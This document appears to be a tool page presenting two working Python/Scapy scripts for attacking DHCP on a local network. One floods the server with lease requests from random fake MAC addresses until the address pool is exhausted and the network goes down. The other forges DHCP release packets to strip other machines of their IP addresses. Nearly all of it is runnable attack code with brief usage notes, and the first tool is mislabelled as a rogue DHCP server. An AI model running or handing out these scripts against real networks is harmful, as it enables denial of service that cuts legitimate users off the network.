DHCP attacks

Rogue DHCP server

(+)This is a rogue dhcp server.

(+)It will request for IP for fake MACs and dhcp server will assign IP addresses for those MACs.

(+)The MAC addresses are randomly created using this tool.

(+)The MAC addresses created and the relavant IP address for each MAC will be saved on "dhcpiplist.txt" file.

As a result DHCP starvation will happen. DHCP server won't be able to release new IP addresses for the network and it leads to a complete network down.

from scapy.all import *

import random

import subprocess

conf.checkIPaddr = False

x_idval = []

hw_strval = []

hwval=[]

attacks = raw_input("Type how many IPs do you need to assign : ")

for i in range(int(attacks)):

x_id = random.randrange(1,1000000)

x_idval.append(x_id)

hw = "00:00:5e"+str(RandMAC())[8:]

hwval.append(hw)

hw_str = mac2str(hw)

hw_strval.append(hw_str)

ans=[]

def discovery(xidfun, hwfun, hwstrfun):

done = False

while not done:

dhcppack = Ether(dst="ff:ff:ff:ff:ff:ff",src=hwfun)/IP(proto = "udp",src="0.0.0.0", dst="255.255.255.255")/UDP(sport=68, dport=67)/BOOTP(xid=xidfun, chaddr=hwstrfun)/DHCP(options=[("message-type","discover"),("end")])

ans, unans = srp(dhcppack, "eth0", timeout = 2.5, verbose=1)

if ans:

done = True

givenip= ans[0][1][BOOTP].yiaddr

gateway = ans[0][1][DHCP].options[7][1]

domainname = ans[0][1][DHCP].options[9][1]

reqdone = False

while not reqdone:

dhcpreq = Ether(dst="ff:ff:ff:ff:ff:ff",src=hwfun)/IP(proto = "udp",src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68, dport=67)/BOOTP(xid=xidfun , chaddr=hwstrfun)/DHCP(options=[("message-type","request"),("server_id", gateway),("requested_addr",givenip),("end")])

ans, unans = srp(dhcpreq, "eth0", timeout = 2.5, verbose=1)

if ans:

reqdone = True

return givenip

fp = open("dhcpiplist.txt","w")

for j,k,l in zip(x_idval,hw_strval,hwval):

iptken = discovery(j,l,k)

print "MAC of : "+l+" , assigned IP is : ",iptken

ipgot = str(iptken)

print >>fp, "MAC : "+l+", IP : "+iptken

print "\n\n**** Find the dhcpiplist.txt file in current directory to see what are the IPs and MACs taken ****"

Forced release DHCP IP

(+)This tool will release the IP addresses on dhcp server.

(+)That's true this can be done by simply type ipconfig/release(in windows) or dhclient -r(in linux). But it will only release

   the certain host's IP only. What about if you need to release some other machines' IPs..? Using this tool you can achieve that.

   That means using this tool you can unassign(release) an IP which belongs to another machine which is on your network. This

   is very usefull for various attacks.

(+)Type the IP address following to the MAC address on dhcpiplist.txt file. The given IPs will be unbound from certain MACs.

from scapy.all import *

import re

maclst =[]

iplst = []

def relpack(ip, hw):

hwstr = mac2str(hw)

x_id = random.randrange(1,1000000)

relpacket = IP(src=ip, dst="192.168.100.254")/UDP(sport=68, dport=67)/BOOTP(chaddr=hwstr,ciaddr = ip,xid=x_id )/DHCP(options=[("message-type","release"),("server_id", "192.168.100.254"),("end")])

done = False

send(relpacket, verbose = 1)

fp = open("dhcpiplist.txt","r")

for line in fp:

ip = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}",line)

mac = re.findall(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w",line)

iplst.append(ip[0])

maclst.append(mac[0])

for hwadd, ipadd in zip(maclst,iplst):

relpack(ipadd, hwadd)

print hwadd+" mac and "+ipadd+" ip released"

Replace 192.168.100.254 with DHCP server IP.